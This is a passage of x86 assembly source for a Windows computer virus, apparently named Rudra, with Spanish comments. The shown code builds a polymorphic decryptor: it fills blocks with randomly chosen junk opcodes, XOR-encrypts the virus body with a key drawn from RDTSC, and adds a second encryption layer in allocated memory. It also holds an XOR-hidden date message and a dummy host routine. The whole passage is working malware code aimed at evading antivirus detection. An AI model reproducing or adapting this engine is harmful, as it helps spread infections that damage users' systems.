ECX LEA EAX, OFS [Fecha] PUSH EAX APICALL GetSystemTime MOV AX, WO [Ultimo_Dia] CMP WO [Fecha.wDay], AX JE @Semillas_Listas MOV AX, WO [Fecha.wDay] MOV WO [Ultimo_Dia], AX APICALL GetTickCount MOV DWO [Aleat], EAX ; inicializar la semilla RDTSC XCHG EBX, EAX CALL Random MOV DWO [Llave], EAX RDTSC XCHG EBX, EDX CALL Random MOV WO [Llave_II], AX @Semillas_Listas: CALL @Segunda_Capa CALL @Colocar_Opcodes LEA ESI, OFS [@I0] MOVSD MOVSB CALL @Colocar_Opcodes LEA ESI, OFS [@I1] MOVSB CALL @Colocar_Opcodes LEA ESI, OFS [@I2] MOVSW MOVSD CALL @Colocar_Opcodes LEA ESI, OFS [@I3] MOVSD MOVSW CALL @Colocar_Opcodes LEA ESI, OFS [@I4] MOVSD MOVSB CALL @Colocar_Opcodes LEA ESI, OFS [@I5] MOVSW MOV EAX, DWO [Llave] STOSD CALL @Colocar_Opcodes LEA ESI, OFS [@I6] MOVSW MOVSB CALL @Colocar_Opcodes LEA ESI, OFS [@I7] MOVSW ; ya esta hecho el desencriptor... ahora... MOV ESI, DWO [Memoria] MOV EAX, DWO [Tama¤o_EC] MOV EBX, 00000004h XOR EDX, EDX DIV EBX XCHG EAX, ECX MOV EAX, DWO [Llave] @EC: MOVSD XOR DWORD PTR [EDI-4h], EAX LOOP @EC PUSH EDI PUSH MEM_DECOMMIT PUSH Tama¤o_Virus PUSH DWO [Memoria] APICALL VirtualFree POP EDI RET Guarda_DC DD 00000000h Tama¤o_EC DD 00000000h Llave DD 00000000h Memoria DD 00000000h Ultimo_Dia DW 0000h ; Instrucciones esenciales DB 24d DUP (90h) @I0: DB 0E8h, 00h, 00h, 00h, 00h ; CALL Delta DB 24d DUP (90h) @I1: POP EBP DB 24d DUP (90h) @I2: SUB EBP, OFFSET DELTA DB 24d DUP (90h) @I3: LEA EDI, OFS [Empieza_Virus] DB 24d DUP (90h) @I4: MOV ECX, Tama¤o_Virus / 4 DB 24d DUP (90h) @I5: DB 081h, 037h DB 24d DUP (90h) @I6: ADD EDI, 04h DB 24d DUP (90h) @I7: LOOP (@I5)-4d ; De Seis bytes. @6Bytes: DB 081h, 0C3h ; ADD EBX DB 081h, 0C2h ; ADD EDX DB 081h, 0C6h ; ADD ESI DB 081h, 0EBh ; SUB EBX DB 081h, 0EAh ; SUB EDX DB 081h, 0EEh ; SUB ESI DB 081h, 0F3h ; XOR EBX DB 081h, 0F2h ; XOR EDX DB 081h, 0F6h ; XOR ESI DB 069h, 0C0h ; IMUL EAX DB 069h, 0DBh ; IMUL EBX DB 069h, 0D2h ; IMUL EDX DB 069h, 0F6h ; IMUL ESI DB 081h, 0E3h ; AND EBX DB 081h, 0E2h ; AND EDX DB 081h, 0E6h ; AND ESI DB 081h, 0CBh ; OR EBX DB 081h, 0CAh ; OR EDX DB 081h, 0CEh ; OR ESI ; Colocar un opcode de seis bytes... @Meter_Opcode_6B: PUSH 018d POP EBX CALL Random IMUL EAX, 02h LEA ESI, OFS [@6Bytes] ADD ESI, EAX MOVSW XOR EBX, EBX DEC EBX CALL Random MOVSD RET ; Instrucciones de cinco bytes. @5Bytes: DB 0B8h ; MOV EAX DB 0BBh ; MOV EBX DB 0BAh ; MOV EDX DB 0BEh ; MOV ESI DB 005h ; ADD EAX DB 02Dh ; SUB EAX DB 035h ; XOR EAX DB 025h ; AND EAX DB 0D7h ; OR EAX ; Colocar un opcode de cinco bytes. @Meter_Opcode_5B: PUSH 08d POP EBX CALL Random LEA ESI, OFS [@5Bytes] ADD ESI, EAX MOVSB XOR EBX, EBX DEC EBX CALL Random MOVSD RET ; Intrucciones de dos bytes. @2Bytes: DB 001h, 0C0h ; ADD EAX, EAX DB 031h, 0C0h ; XOR EAX, EAX DB 001h, 0DBh ; ADD EBX, EBX DB 031h, 0DBh ; XOR EBX, EBX DB 001h, 0D2h ; ADD EDX, EDX DB 031h, 0D2h ; XOR EDX, EDX DB 001h, 0D8h ; ADD EAX, EBX DB 001h, 0D0h ; ADD EAX, EDX DB 031h, 0D8h ; XOR EAX, EBX DB 031h, 0D0h ; XOR EAX, EDX DB 031h, 0C3h ; XOR EBX, EAX DB 031h, 0D3h ; XOR EBX, EDX DB 031h, 0C2h ; XOR EDX, EAX DB 031h, 0DAh ; XOR EDX, EBX DB 001h, 0F6h ; ADD ESI, ESI DB 031h, 0F6h ; XOR ESI, ESI @Meter_Opcode_2B: PUSH 15d POP EBX CALL Random ADD EAX, EAX LEA ESI, OFS [@2Bytes] ADD ESI, EAX MOVSB MOVSB RET ; Instrucciones de un byte. @1Byte: DB 046h ; INC ESI DB 04Eh ; DEC ESI DB 040h ; INC EDX DB 042h ; INC EAX DB 043h ; INC EBX DB 04Ah ; DEC EDX DB 048h ; DEC EAX DB 04Bh ; DEC EBX DB 092h ; XCHG EDX, EAX DB 093h ; XCHG EBX, EAX DB 096h ; XCHG ESI, EAX ; Colocar opcode de un byte. @Meter_Opcode_1B: PUSH 10d POP EBX CALL Random LEA ESI, OFS [@1Byte] ADD ESI, EAX MOVSB RET ; Este proceso rellena cada bloque de 24 bytes con varias combinaciones ; diferentes de opcodes. @Colocar_Opcodes: PUSH 04d POP ECX @CO_1: ; Manera1: 20% 0-20 ; Manera2: 20% 20-40 ; Manera3: 20% 40-60 ; Manera4: 10% 60-70 ; Manera5: 15% 70-85 ; Manera6: 15% 85-100 PUSH 20d POP EBX CALL Random CMP AL, 4d JBE @CO_Manera1 CMP AL, 8d JBE @CO_Manera2 CMP AL, 12d JBE @CO_Manera3 CMP AL, 14d JBE @CO_Manera4 CMP AL, 17d JBE @CO_Manera5 CMP AL, 20d JBE @CO_Manera6 JMP @CO_1 @CO_Regresa: LOOP @CO_1 RET @CO_Manera1: CALL @Meter_Opcode_6B JMP @CO_Regresa @CO_Manera2: CALL @Meter_Opcode_1B CALL @Meter_Opcode_5B JMP @CO_Regresa @CO_Manera3: CALL @Meter_Opcode_5B CALL @Meter_Opcode_1B JMP @CO_Regresa @CO_Manera4: CALL @Meter_Opcode_2B CALL @Meter_Opcode_2B CALL @Meter_Opcode_2B JMP @CO_Regresa @CO_Manera5: CALL @Meter_Opcode_2B CALL @Meter_Opcode_1B CALL @Meter_Opcode_2B CALL @Meter_Opcode_1B JMP @CO_Regresa @CO_Manera6: CALL @Meter_Opcode_1B CALL @Meter_Opcode_2B CALL @Meter_Opcode_2B CALL @Meter_Opcode_1B JMP @CO_Regresa ; Generador de numeros aleatorios de congruencia linear. ; ; EBX -> Limite superior. ; Retorna en EAX el numero aleatorio. Random: PUSH ECX MOV EAX, DWO [Aleat] IMUL EAX, EAX, 036FB5419h ADD EAX, 00004A6Dh MOV DWO [Aleat], EAX XOR EDX, EDX DIV EBX XCHG EDX, EAX POP ECX RET ; Proceso para copiar la segunda capa de encriptacion. @Segunda_Capa: PUSHAD PUSH PAGE_READWRITE PUSH MEM_COMMIT + MEM_RESERVE + MEM_TOP_DOWN PUSH Tama¤o_Virus PUSH NULL APICALL VirtualAlloc MOV DWO [Memoria], EAX OR EAX, EAX JZ @NosJodimos MOV EDI, EAX LEA ESI, OFS [Empieza_Virus] MOV ECX, (Empieza_Layer2 - Empieza_Virus) REP MOVSB MOV AX, WO [Llave_II] MOV ECX, Tama¤o_Layer2 / 2 @@JO: MOVSW ADD WORD PTR [EDI-2h], AX LOOP @@JO @NosJodimos: POPAD RET Aleat DD 00000000h RUMEN ENDP ; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ NOP DB "R" XOR 43h DB "e" XOR 43h DB "c" XOR 43h DB "u" XOR 43h DB "e" XOR 43h DB "r" XOR 43h DB "d" XOR 43h DB "a" XOR 43h DB " " XOR 43h DB "e" XOR 43h DB "l" XOR 43h DB " " XOR 43h DB "4" XOR 43h DB " " XOR 43h DB "d" XOR 43h DB "e" XOR 43h DB " " XOR 43h DB "F" XOR 43h DB "e" XOR 43h DB "b" XOR 43h DB "r" XOR 43h DB "e" XOR 43h DB "r" XOR 43h DB "o" XOR 43h DB " " XOR 43h DB "d" XOR 43h DB "e" XOR 43h DB " " XOR 43h DB "1" XOR 43h DB "9" XOR 43h DB "9" XOR 43h DB "2" XOR 43h DB "." XOR 43h DB "." XOR 43h DB "." XOR 43h DB 43h Termina_Virus LABEL NEAR ; ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ Host_Falso PROC CALL MessageBoxA, 0, OFFSET Ventana, OFFSET Titulo, 0 CALL ExitProcess, 0 Host_Falso ENDP End Rudra